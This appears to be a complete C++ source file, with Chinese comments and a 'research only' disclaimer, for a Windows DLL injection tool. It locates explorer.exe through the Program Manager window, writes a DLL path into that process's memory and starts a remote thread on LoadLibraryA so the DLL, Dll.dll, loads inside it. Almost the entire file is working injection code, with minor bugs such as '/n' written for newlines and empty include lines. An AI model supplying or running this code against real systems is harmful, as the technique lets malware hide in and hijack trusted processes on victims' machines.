//Dll注入系统，注入的文件名为Dll.dll；
//本文仅供研究不得用于非法用途，后果自负
// RemoteThreadDll.cpp : Defines the entry point for the console application.
//
#include "stdafx.h"
#include 
#include 
int main(int argc, char* argv[])
{
       HWND hand;
       HANDLE hProcess;
       HMODULE hmod;
       char szMyDllFull[256];
       DWORD dwThreadID=NULL,dwProcessID=NULL ;
       PDWORD lpLoadLibrary,lpDllName;
       GetCurrentDirectory(MAX_PATH,szMyDllFull);
       lstrcat(szMyDllFull,"//Dll.dll");
       printf("%s/n",szMyDllFull);
       hmod=GetModuleHandle("kernel32.dll");
       lpLoadLibrary=(PDWORD)GetProcAddress(hmod,"LoadLibraryA");
       hand=FindWindow("Progman","Program Manager");
              if(hand==NULL)
       {
              printf("找不到 progarm manager/n");
              return 0;
       }
       dwThreadID=GetWindowThreadProcessId(hand,&dwProcessID);
       hProcess=OpenProcess(PROCESS_CREATE_THREAD|PROCESS_VM_OPERATION|PROCESS_VM_WRITE,FALSE,dwProcessID);
       if(hProcess!=NULL)
       {
              lpDllName=(PDWORD)VirtualAllocEx(hProcess,NULL,MAX_PATH,MEM_COMMIT,PAGE_READWRITE);
              printf("%x/n",lpDllName);
              WriteProcessMemory(hProcess,lpDllName,szMyDllFull,MAX_PATH,NULL);
              CreateRemoteThread(hProcess,NULL,0, (LPTHREAD_START_ROUTINE )lpLoadLibrary,lpDllName,0,NULL);
              CloseHandle(lpDllName);
              CloseHandle(hProcess);
              //ExitProcess(NULL);
       }
       else
              printf("faile/n");
       return 0;
}